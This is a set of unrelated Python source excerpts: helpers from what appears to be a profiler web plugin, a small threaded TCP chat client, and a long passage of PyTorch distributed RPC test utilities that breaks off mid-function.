        return profile
    raise exceptions.BadRequest('Get an unexpected profile type %s for %s/%s' % (type(profile), name, worker))
def _get_distributed_profile_for_request(self, request: werkzeug.Request) -> DistributedRunProfile:
    """Fetch the aggregate ('All'-worker) distributed profile for a run."""
    name = request.args.get('run')
    span = request.args.get('span')
    self._validate(run=name)
    profile = self._get_profile(name, 'All', span)
    if isinstance(profile, DistributedRunProfile):
        return profile
    raise exceptions.BadRequest('Get an unexpected distributed profile type %s for %s' % (type(profile), name))
def _get_profile(self, name, worker, span):
    """Fetch one worker/span profile from a run; 404 NotFound when missing."""
    profile = self._get_run(name).get_profile(worker, span)
    if profile is None:
        raise exceptions.NotFound('could not find the profile for %s/%s/%s ' % (name, worker, span))
    return profile
def _validate(self, **kwargs):
    """Raise BadRequest for the first query parameter that is missing (None)."""
    for param, value in kwargs.items():
        if value is None:
            raise exceptions.BadRequest('Must specify %s in request url' % (param))
|
import socket
import threading

# Simple TCP chat client: a background thread prints incoming messages while
# another sends user input until the connection drops.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hostname = input("Enter your host :: ")
s.connect((hostname, 1023))
nickname = input("Enter your Name :: ")


def receive():
    """Print messages from the server and answer the NICK handshake.

    Bug fixes vs. the original: an empty recv (server closed the socket) now
    terminates the loop instead of spinning forever, and the broken `flag`
    mechanism (assigned without `global`, checked only once at import time)
    is removed — each loop simply closes the socket and exits on error.
    """
    while True:
        try:
            msg = s.recv(1024).decode("utf-8")
            if not msg:
                # Empty read means the server closed the connection.
                print("Connection closed by server")
                s.close()
                break
            if msg == "NICK":
                print("Welcome to Chat room :: ", nickname)
                s.send(bytes(nickname, "utf-8"))
            else:
                print(msg)
        except Exception as error:
            print(f"An error occurred {error}")
            s.close()
            break


def write():
    """Read lines from stdin and send them prefixed with the nickname."""
    while True:
        try:
            reply_msg = f"{nickname} :: {input()}"
            s.send(bytes(reply_msg, "utf-8"))
        except Exception as error:
            print(f"An error occurred while sending message !!!\n error : {error}")
            s.close()
            break


receive_thrd = threading.Thread(target=receive)
receive_thrd.start()
write_thrd = threading.Thread(target=write)
write_thrd.start()
|
rpc_test.py | import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info, WorkerInfo
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import (
IS_MACOS,
load_tests,
sandcastle_skip_if,
get_cycles_per_ms,
)
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
    """Trivial remote-callable helper: return 1 + 1 as a length-1 tensor."""
    one = torch.ones(1)
    return torch.add(one, one)
def udf_with_torch_ops(device=-1, use_record_function=False):
    """Run a fixed chain of tensor ops, optionally on a CUDA device and/or
    inside a "##forward##" record_function block (for profiler-event tests)."""
    if device == -1:
        device_ctx = contextlib.suppress()  # no-arg suppress == null context
    else:
        device_ctx = torch.cuda.device(device)
    if use_record_function:
        record_function_ctx = torch.autograd.profiler.record_function("##forward##")
    else:
        record_function_ctx = contextlib.suppress()
    with device_ctx, record_function_ctx:
        t = torch.add(torch.ones(1), torch.ones(1))
        t = torch.mul(t, t)
        t = t.relu()
        t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
    "aten::ones",
    "aten::ones",
    "aten::add",
    "aten::mul",
    "aten::relu",
    "aten::clamp_min",  # NOTE(review): relu appears to additionally emit clamp_min
    "aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
# Cross-worker handshake futures resolved by set_value/set_and_check_done below.
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
# 50 million GPU cycles — busy-wait size constant (usage not shown in this chunk).
FIFTY_MIL_CYCLES = 50000000
# Counter mutated by _increment_count/_reset_count to verify barrier behavior.
_rpc_barrier_count = 0
def _increment_count():
    """Bump the module-level RPC-barrier counter."""
    global _rpc_barrier_count
    _rpc_barrier_count = _rpc_barrier_count + 1
def _reset_count():
    """Reset the module-level RPC-barrier counter back to zero."""
    global _rpc_barrier_count
    _rpc_barrier_count = 0
class StubRpcAgent:
    """Minimal fake RPC agent exposing just enough surface for backend tests."""

    def __init__(self, world_size):
        self.world_size = world_size

    def get_worker_infos(self):
        """Return a WorkerInfo set covering every rank in the stub world."""
        infos = set()
        for rank in range(self.world_size):
            infos.add(WorkerInfo(name=worker_name(rank), id=rank))
        return infos
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
    """Backend-registration stub: ignore everything except world_size."""
    return StubRpcAgent(world_size=world_size)
def set_value(value):
    """Resolve the module-level VALUE_FUTURE (typically from a remote call)."""
    VALUE_FUTURE.set_result(value)
def wait_for_value_future():
    """Block until VALUE_FUTURE is resolved and return its value."""
    return VALUE_FUTURE.result()
def set_and_check_done(value):
    """Resolve VALUE_FUTURE, then block on DONE_FUTURE and return its value."""
    VALUE_FUTURE.set_result(value)
    return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
# Lightweight record carrying a container of tensors across RPC boundaries.
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
    """Exercises the internal RPC pickler: pickling yields a serialized
    PythonUDF payload; unpickling executes that UDF and stores its result."""

    def __init__(self):
        self.t = None

    def __getstate__(self):
        # Serialize a my_tensor_function UDF over two ones-tensors instead of
        # the actual instance state.
        (pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
            PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
        )
        return (pickled_python_udf, tensors)

    def __setstate__(self, obj):
        # Rebuild the UDF, execute it, and keep the result on self.t.
        python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
        result = python_udf.func(python_udf.args[0], python_udf.args[1])
        self.t = result

    def set(self, val):
        self.t = val
class SlowPickleClass:
    """Deliberately slow (de)serialization: both directions sleep self.t seconds."""

    def __init__(self, t):
        self.t = t

    def __getstate__(self):
        """Sleep, then pickle only the delay itself."""
        time.sleep(self.t)
        return (self.t,)

    def __setstate__(self, obj):
        """Restore the delay and sleep for it again."""
        self.t = obj[0]
        time.sleep(self.t)
class MyClass:
    """Simple stateful RPC target covering every method kind (instance/class/static)."""

    def __init__(self, a, delay=False):
        self.a = a
        # delay initialization to simulate errors if specified
        if delay:
            time.sleep(2)

    def my_instance_method(self, b):
        """Return the stored value plus b."""
        return self.a + b

    @classmethod
    def my_class_method(cls, d, e):
        """Return d + e (ignores the class)."""
        return d + e

    @staticmethod
    def my_static_method(f):
        """True exactly when f exceeds 10."""
        return f > 10

    def increment_value(self, increment):
        """Add *increment* to the stored value in place."""
        self.a += increment

    def get_value(self):
        """Return the stored value."""
        return self.a

    def my_slow_method(self, my_tensor_arg):
        """Sleep 5 seconds, then add the stored value to the tensor argument."""
        time.sleep(5)
        return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
    """Wrap each value in a locally-owned RRef holding a MyClass instance."""
    return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
    """Fetch the rref's value to the caller and add *value* to it."""
    fetched = rref.to_here()
    return fetched + value
def run_nested_pickle(pickle_cls_instance, tensor):
    """Add *tensor* to the value the (unpickled) instance stored on .t."""
    return pickle_cls_instance.t + tensor
def build_sparse_tensor(coalesce=False):
    """Return a fixed 2x3 sparse COO tensor with three nonzero entries."""
    indices = [[0, 1, 1], [2, 0, 2]]
    values = [3, 4, 5]
    result = torch.sparse_coo_tensor(indices, values, (2, 3))
    return result.coalesce() if coalesce else result
def build_complex_tensors():
    """Return nested containers (lists and a tensor-keyed dict) all sharing one tensor."""
    base = torch.ones(3, 3)
    pair = [base, base]
    quad = [pair, pair]
    mixed = [base, pair]
    keyed = {base: mixed}  # tensors hash by identity, so this is a valid key
    return [base, pair, quad, mixed, keyed]
def non_cont_test(t_view, t_cont):
    """Validate that t_view is a non-contiguous view equal to contiguous t_cont,
    then return t_view."""
    checks = (
        (t_view.is_contiguous(), 't_view is contiguous!'),
        (not t_cont.is_contiguous(), 't_cont is not contiguous!'),
        (not torch.equal(t_view, t_cont), 't_view is not equal to t_cont!'),
    )
    for failed, message in checks:
        if failed:
            raise Exception(message)
    return t_view
def my_function(a, b, c):
    """Return the sum of the three arguments."""
    partial_sum = a + b
    return partial_sum + c
def my_tensor_function(a, b):
    """Return a + b (elementwise for tensors)."""
    total = a + b
    return total
def my_container_sum(a):
    """Accumulate all entries of *a* starting from its first element.

    Note: uses += deliberately, so for tensors the first element is
    accumulated into in place — preserved from the original semantics.
    """
    total = a[0]
    for item in a[1:]:
        total += item
    return total
def my_sleep_func(seconds=1):
    """Sleep for *seconds*, then return tensor(1) * tensor(1)."""
    time.sleep(seconds)
    return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
    """Sum every list entry (note: the first element is counted twice, as the
    accumulator starts at list_input[0] and the loop revisits it) plus all
    dict values; also unpack the three tensors on tensor_class_input."""
    res = list_input[0]
    for item in list_input:
        res += item
    for value in dict_input.values():
        res += value
    complex_tensors = tensor_class_input.tensors
    return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
    """Fetch both RRef values to the caller and return their sum."""
    left = rref_a.to_here()
    right = rref_b.to_here()
    return left + right
def delayed_add(a, b, seconds=0.05):
    """Sleep for *seconds*, then return a + b."""
    time.sleep(seconds)
    return a + b
def identity(a):
    """Return the argument unchanged."""
    return a
def no_result():
    """Side-effect-only RPC target: prints and returns None."""
    print("do nothing")
def raise_or_inc(value):
    """Raise ValueError for 2-element tensors; otherwise return value + 1."""
    if value.numel() == 2:
        raise ValueError("Expected error")
    return value + 1
def nested_rpc(dst):
    """Issue a synchronous add RPC to *dst* from inside another RPC."""
    return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def nested_rpc_sparse(dst):
    """Sparse-tensor variant of nested_rpc."""
    return rpc.rpc_sync(
        dst,
        torch.add,
        args=(build_sparse_tensor(), build_sparse_tensor())
    )
def multi_layer_nested_async_rpc(dst, world_size, ttl):
    """Fan out a chain of async RPCs around the ring until ttl hits zero."""
    # this method returns immediately without blocking the callee, but will
    # generate additional requests.
    if ttl > 0:
        current_dst = worker_name(dst)
        next_dst = (dst + 1) % world_size
        rpc.rpc_async(
            current_dst,
            multi_layer_nested_async_rpc,
            args=(next_dst, world_size, ttl - 1),
        )
        return 0
def nested_rref(dst):
    """Create two remote add RRefs on *dst* and return them as a tuple."""
    return (
        rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
        rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
    )
def nested_rref_sparse(dst):
    """Sparse-tensor variant of nested_rref."""
    return (
        rpc.remote(
            dst,
            torch.add,
            args=(build_sparse_tensor(), build_sparse_tensor())
        ),
        rpc.remote(
            dst,
            torch.add,
            args=(build_sparse_tensor(), build_sparse_tensor())
        ),
    )
def nested_remote(dst):
    """Create a remote add RRef on *dst* and fetch its value back."""
    rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
    return rref.to_here()
def nested_remote_sparse(dst):
    """Sparse-tensor variant of nested_remote."""
    rref = rpc.remote(dst, torch.add, args=(build_sparse_tensor(), build_sparse_tensor()))
    return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
    """Forward an RRef around the ring ttl hops, then resolve it at the end.

    Returns a nested single-element list of RRefs while ttl > 0, and the
    fetched value at the final hop.
    """
    if ttl > 0:
        current_dst = worker_name(dst)
        next_dst = (dst + 1) % world_size
        ret_rref = rpc.remote(
            current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
        )
        return [ret_rref]
    else:
        return rref.to_here()
def rpc_return_rref(dst):
    """Return an RRef owned by *dst* (tests sending RRefs through responses)."""
    return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
    """Cheapest possible RPC target: no work, constant return."""
    return 0
def heavy_rpc(tensor):
    """Busy-loop of in-place tensor ops simulating an expensive RPC body."""
    for factor in range(1, 100):
        tensor *= factor
        tensor /= factor + 1
    return 0
def heavy_rpc_sparse(tensor):
    """Like heavy_rpc but dividing out-of-place (in-place div is unsupported
    for sparse tensors)."""
    for factor in range(1, 100):
        tensor *= factor
        tensor = tensor / (factor + 1)
    return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
    """TorchScript-compiled twin of heavy_rpc (in-place multiply/divide loop)."""
    for i in range(1, 100):
        tensor *= i
        tensor /= i + 1
    return 0
@torch.jit.script
def my_script_func(tensor):
    """TorchScript target returning tensor + tensor."""
    return torch.add(tensor, tensor)
# Message shared between raise_func and tests asserting on the error text.
expected_err = "Expected error"


def raise_func():
    """Unconditionally raise ValueError(expected_err)."""
    raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
    """TorchScript target that always raises ValueError with the given text."""
    raise ValueError(expected_err)
# Multi-line message exercising newline escaping in propagated RPC errors.
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"


def raise_func_escape():
    """Unconditionally raise ValueError(expected_err_escape)."""
    raise ValueError(expected_err_escape)
# Module-global RRef slot manipulated remotely by the tests.
global_rref = None


def set_global_rref(rref):
    """Store *rref* in the module-global slot."""
    global global_rref
    global_rref = rref


def clear_global_rref():
    """Drop the module-global RRef reference."""
    global global_rref
    global_rref = None
def check_rref_confirmed(rref):
    """True once the owner has confirmed this RRef."""
    return rref.confirmed_by_owner()
def get_rref_debug_info():
    """Return the RRef-context debug-info dict of the local RPC agent."""
    return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
    """Compute (x + y) remotely, add z in a completion callback, and block on a
    concurrent.futures.Future for the result."""
    out = concurrent.futures.Future()

    def callback(fut):
        out.set_result(fut.wait() + z)

    fut = rpc.rpc_async(to, torch.add, args=(x, y))
    fut.then(callback)
    return out.result()
def get_events_from_profile(profile_rref):
    """Return the process-global function events of a remotely held profile."""
    local_profile = profile_rref.local_value()
    return local_profile.process_global_function_events
def add_use_future_set_result(to, x, y, z):
    """Like add_use_future_cb but resolving a torch.futures.Future via a lambda."""
    out = torch.futures.Future()
    fut = rpc.rpc_async(to, torch.add, args=(x, y))
    fut.then(lambda fut : out.set_result(fut.wait() + z))
    return out.wait()
def add_use_future_nested_cb(to, x, y, z):
    """Chain two async RPCs: (x + y) first, then + z, resolving an outer Future."""
    out = torch.futures.Future()

    def callback(fut1):
        # Second hop: add z to the first RPC's result.
        fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
        fut2.then(lambda fut2 : out.set_result(fut2.wait()))

    fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
    fut1.then(callback)
    return out.wait()
def fail_on_fut(fut):
    """Deliberate no-op callback used where a future handler is required."""
    pass
@rpc.functions.async_execution
def async_raise_func():
    """async_execution target that raises instead of returning a Future."""
    raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
    """async_execution target returning a tensor rather than the required Future."""
    return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
    """Return the Future of a remote x + y (resolved by the framework)."""
    return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
    """Sleep one second, add x + y on *device*, and return the result on CPU."""
    time.sleep(1)
    x = x.to(device)
    y = y.to(device)
    return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
    """Async wrapper dispatching slow_add to worker *to*."""
    return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
    """Resolve a manually constructed Future with (x + y) + z."""
    fut = torch.futures.Future()
    rpc.rpc_async(to, torch.add, args=(x, y)).then(
        lambda fut1: fut.set_result(fut1.wait() + z)
    )
    return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
    """Chain + z onto the Future of a remote x + y."""
    return rpc.rpc_async(to, torch.add, args=(x, y)).then(
        lambda fut: fut.wait() + z
    )
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
    """Chain *num* sequential +step callbacks onto one remote add Future."""
    fut = rpc.rpc_async(to, torch.add, args=(x, 0))
    for _ in range(num):
        # Each lambda receives the previous future, so late binding is safe here.
        fut = fut.then(lambda fut: fut.wait() + step)
    return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
    """Nest one async_execution call inside another, then add z."""
    return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
        lambda fut: fut.wait() + z
    )
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
    """Fan out *num* adds in parallel and resolve one Future with their sum."""
    futs = []
    for i in range(num):
        if i == 0:
            futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
        else:
            futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
    # TODO: use torch.futures.collect_all
    lock = Lock()
    state = {"cnt": 0, "ret": torch.zeros_like(x)}
    ret_future = torch.futures.Future()

    def inc_and_set(fut):
        # Callbacks may run concurrently; guard the shared accumulator.
        with lock:
            state["cnt"] += 1
            state["ret"] += fut.wait()
            if state["cnt"] >= len(futs):
                ret_future.set_result(state["ret"])

    for fut in futs:
        fut.then(inc_and_set)
    return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
    """On a side CUDA stream: sleep ~1s on-device, fill t with ones, and return
    a device-aware Future already holding t."""
    device = t.device
    original_stream = torch.cuda.current_stream(device)
    new_stream = torch.cuda.Stream(device)
    new_stream.wait_stream(original_stream)
    with torch.cuda.stream(new_stream):
        torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
        t.fill_(1)
        fut = Future(devices=[device])
        fut.set_result(t)
        return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
    """Remote x + y, then a callback that sleeps on-device and adds z."""
    def cb(fut):
        torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
        return fut.value() + z

    return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
    """Lock-guarded tensor holder; records a CUDA event on every sum()."""
    __slots__ = ("tensor", "lock", "event")

    def __init__(self, t):
        self.tensor = t
        # Add one non-picklable field, to ensure it's ignored/skipped.
        self.lock = Lock()
        self.event = torch.cuda.Event(enable_timing=True)

    def increase(self, v):
        """Add v to the wrapped tensor, serialized by the lock."""
        with self.lock:
            self.tensor += v

    def sum(self):
        """Record the CUDA event and return the tensor's sum (under the lock)."""
        with self.lock:
            self.event.record()
            return self.tensor.sum()
class AsyncExecutionClass:
    """async_execution methods of every binding kind: static, class, instance."""

    @staticmethod
    @rpc.functions.async_execution
    def static_async_add(to, x, y, z):
        """Chain + z onto a remote x + y."""
        return rpc.rpc_async(to, torch.add, args=(x, y)).then(
            lambda fut: fut.wait() + z
        )

    @classmethod
    @rpc.functions.async_execution
    def class_async_add(cls, to, x, y, z):
        """Resolve a pre-created Future with (x + y) + z."""
        ret_fut = torch.futures.Future()
        rpc.rpc_async(to, torch.add, args=(x, y)).then(
            lambda fut: ret_fut.set_result(fut.wait() + z)
        )
        return ret_fut

    @rpc.functions.async_execution
    def bound_async_add(self, to, x, y, z):
        """Instance-bound variant of static_async_add."""
        return rpc.rpc_async(to, torch.add, args=(x, y)).then(
            lambda fut: fut.wait() + z
        )
def return_future():
    """Return a fresh, unresolved torch Future."""
    fresh = torch.futures.Future()
    return fresh
class FooBackendOptions(rpc.RpcBackendOptions):
    """RpcBackendOptions subclass carrying only an init_method string."""

    def __init__(self, init_method):
        # Must call the __init__ of the superclass (and do so directly,
        # without using super()) because... pybind.
        rpc.RpcBackendOptions.__init__(self)
        self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
# (re-exports the imported hook at module scope so unittest discovers it).
load_tests = load_tests
class MyEmbeddingBagModel(torch.nn.Module):
    """10x10 EmbeddingBag wrapper; *sparse* selects sparse vs dense gradients."""

    def __init__(self, sparse):
        super().__init__()
        self.eb = torch.nn.EmbeddingBag(10, 10, sparse=sparse)

    def forward(self, x):
        """Look up and pool the index bags in x."""
        return self.eb(x)
class MyParameterServer:
    """Gradient-averaging parameter server driven by async_execution RPCs."""

    def __init__(self, trainers):
        self.lock = Lock()
        self.trainers = trainers   # number of trainers expected per iteration
        self.iteration = 0         # highest iteration seen so far
        self.updates = 0           # tensors received for the current iteration
        self.futures = []          # per-trainer futures resolved when all arrive
        self.total = None          # running sum of received tensors
        self.gradient = None       # last computed average

    @staticmethod
    def get_gradient(rref):
        """Return the averaged gradient stored on the owner."""
        return rref.local_value().gradient

    @staticmethod
    @rpc.functions.async_execution
    def average(rref, riteration, tensor):
        """Accumulate *tensor*; once all trainers have reported, resolve every
        pending future with the average."""
        self = rref.local_value()
        fut = torch.futures.Future()
        with self.lock:
            if riteration > self.iteration:
                # A newer iteration started: drop stale bookkeeping.
                # NOTE(review): self.total is NOT reset here — confirm intended.
                self.iteration = riteration
                self.updates = 0
                self.futures.clear()
            self.futures.append(fut)
            if self.total is None:
                self.total = tensor
            else:
                self.total += tensor
            self.updates += 1
            if self.trainers == self.updates:
                self.gradient = self.total / float(self.trainers)
                for fut in self.futures:
                    result = self.total / float(self.trainers)
                    fut.set_result(result)
        return fut
class RpcTestCommon():
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
    """Invoke fn on worker *to* via the requested RPCExecMode and return the
    result (None for an unrecognized mode)."""
    if mode == RPCExecMode.SYNC:
        return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
    elif mode == RPCExecMode.ASYNC:
        return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
    elif mode == RPCExecMode.REMOTE:
        return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _self_py_udf_remote(self, worker_info, x, y, z):
    """remote() to one's own worker must still compute my_function correctly."""
    rref = rpc.remote(worker_info, my_function, args=(x, y, z))
    self.assertEqual(rref.to_here(), x + y + z)
def _self_remote_rref_as_rpc_arg(self, dst, x, y, z):
    """A self-owned RRef must be usable as an argument of sync and async RPCs."""
    self_worker_info = rpc.get_worker_info()
    rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
    fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, x))
    ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, x + y))
    self.assertEqual(ret, x + y + z + x + y)
    self.assertEqual(fut.wait(), x + y + z + x)
def _self_remote_rref_as_remote_arg(self, dst, x, y, z):
    """A self-owned RRef must be usable as an argument of remote() calls."""
    self_worker_info = rpc.get_worker_info()
    rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
    ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, x))
    self.assertEqual(
        ret_rref.to_here(), x + y + z + x
    )
def _world_size_one(self, a, b):
    """On rank 0 only: init a single-process RPC world ("me") and verify that
    sync/async/remote self-calls of my_tensor_function all return a + b.

    Note: the helper assertions use `expect = x * 2`, which assumes a == b.
    """
    if self.rank == 0:
        rpc.init_rpc(
            name="me",
            backend=self.rpc_backend,
            rank=0,
            world_size=1,
            rpc_backend_options=self.rpc_backend_options,
        )

        def _rpc_sync(x, y):
            expect = x * 2
            result = rpc.rpc_sync(
                "me",
                my_tensor_function,
                args=(x, y)
            )
            self.assertEqual(expect, result)

        def _rpc_async(x, y):
            expect = x * 2
            result = rpc.rpc_async(
                "me",
                my_tensor_function,
                args=(x, y)
            ).wait()
            self.assertEqual(expect, result)

        def _remote(x, y):
            expect = x * 2
            result = rpc.remote(
                "me",
                my_tensor_function,
                args=(x, y)
            ).to_here()
            self.assertEqual(expect, result)

        _rpc_sync(a, b)
        _rpc_async(a, b)
        _remote(a, b)

        rpc.shutdown()
def _multi_rpc(self, sparse):
    """Fire 20 sequential add RPCs to the next rank (dense or sparse inputs)
    and check each result."""
    dst_rank = (self.rank + 1) % self.world_size
    for i in range(20):
        n = i + self.rank + 1
        if sparse:
            x = build_sparse_tensor() * n
            y = build_sparse_tensor() * n
        else:
            x = torch.ones(2, 2)
            y = torch.ones(2, 2)
        ret = rpc.rpc_sync(
            worker_name(dst_rank),
            torch.add,
            args=(x, y),
        )
        self.assertEqual(ret, x * 2)
def _wait_all_workers(self, f, x):
    """Run an uneven workload across workers and verify _wait_all_workers()
    drains outstanding RPCs before an ungraceful shutdown."""
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    rpc.init_rpc(
        name="worker%d" % self.rank,
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )
    self._run_uneven_workload(f, x)
    # worker0 calls this at the end after waiting for RPC responses.
    # worker1/2 calls this immediately and has some works after it.
    # worker3 calls this immediately and has no more work.
    rpc.api._wait_all_workers()
    # Wait before proceeding to shutdown to ensure worker0 RPCs make
    # it through to other workers.
    dist.barrier()
    rpc.shutdown(graceful=False)
def _wait_all_workers_twice(self, f, x):
    """Same as _wait_all_workers, but verifies the call is safely repeatable."""
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    rpc.init_rpc(
        name="worker%d" % self.rank,
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )

    self._run_uneven_workload(f, x)

    # worker0 calls this at the end after waiting for RPC responses.
    # worker1/2 calls this immediately and has some works after it.
    # worker3 calls this immediately and has no more work.
    rpc.api._wait_all_workers()
    # A second call must neither hang nor raise.
    rpc.api._wait_all_workers()

    # Wait before proceeding to shutdown to ensure worker0 RPCs make
    # it through to other workers.
    dist.barrier()
    rpc.shutdown(graceful=False)
def _nested_rpc(self, f, expected):
    """Sync RPC to the next rank where `f` itself issues an RPC back to this worker."""
    peer = worker_name((self.rank + 1) % self.world_size)
    result = rpc.rpc_sync(peer, f, args=(worker_name(self.rank),))
    self.assertEqual(result, expected)
def _stress_test_rpc(self, f, repeat=1000, args=()):
    """Fire `repeat` async RPCs at the next rank and verify every result is 0."""
    dst = worker_name((self.rank + 1) % self.world_size)
    tik = time.time()
    futs = [rpc.rpc_async(dst, f, args=args) for _ in range(repeat)]
    for val in torch.futures.wait_all(futs):
        self.assertEqual(val, 0)
    tok = time.time()
    print(
        "Rank {} finished testing {} times in {} seconds.".format(
            self.rank, repeat, tok - tik
        )
    )
def _builtin_remote_ret(self, x, y, expected):
    """rpc.remote of a builtin op on the next rank; fetch and check the result."""
    peer = worker_name((self.rank + 1) % self.world_size)
    result = rpc.remote(peer, torch.add, args=(x, y)).to_here()
    self.assertEqual(result, expected)
def _builtin_remote_self(self, x, y, expected):
    """rpc.remote of a builtin op targeted at this very worker; check via local_value()."""
    own_name = worker_name(self.rank)
    owner_rref = rpc.remote(own_name, torch.add, args=(x, y))
    self.assertEqual(owner_rref.local_value(), expected)
def _test_multi_remote_call(self, fn, sparse, args_fn=lambda x, y: (), kwargs_fn=lambda x, y: {}):
    """Issue several rpc.remote calls to the next rank and compare each RRef with local execution."""
    num_calls = 10
    dst = worker_name((self.rank + 1) % self.world_size)
    n = self.rank + 1
    rrefs, expected = [], []
    for step in range(num_calls):
        # n accumulates across iterations (n += step), mirroring the original
        # sequence of argument values.
        n += step
        rrefs.append(
            rpc.remote(
                dst,
                fn,
                args=args_fn(n, sparse),
                kwargs=kwargs_fn(n, sparse),
            )
        )
        expected.append(fn(*args_fn(n, sparse), **kwargs_fn(n, sparse)))
    for rref, exp in zip(rrefs, expected):
        self.assertEqual(rref.to_here(), exp)
def _py_rref_args(self, a, b, x, y, expected):
    """Pass two RRefs produced on the peer into a UDF executed on that same peer."""
    peer = worker_name((self.rank + 1) % self.world_size)
    first = rpc.remote(peer, torch.add, args=(a, b))
    second = rpc.remote(peer, torch.add, args=(x, y))
    combined = rpc.remote(peer, my_rref_function, args=(first, second))
    self.assertEqual(combined.to_here(), expected)
def _py_rref_args_user_share(self, a, b, c, x, y, z, expected):
    """Share user RRefs: RRefs owned by one peer are consumed by a UDF on a different peer."""
    n = self.rank + 1
    owner = worker_name(n % self.world_size)
    user = worker_name((n + 1) % self.world_size)
    rref_1 = rpc.remote(owner, my_function, args=(a, b, c))
    rref_2 = rpc.remote(owner, my_function, args=(x, y, z))
    combined = rpc.remote(user, my_rref_function, args=(rref_1, rref_2))
    self.assertEqual(combined.to_here(), expected)
def _py_rpc_rref_args(self, a, b, c, x, y, z, expected):
    """Pass RRefs as arguments to a synchronous RPC (rather than to rpc.remote)."""
    peer = worker_name((self.rank + 1) % self.world_size)
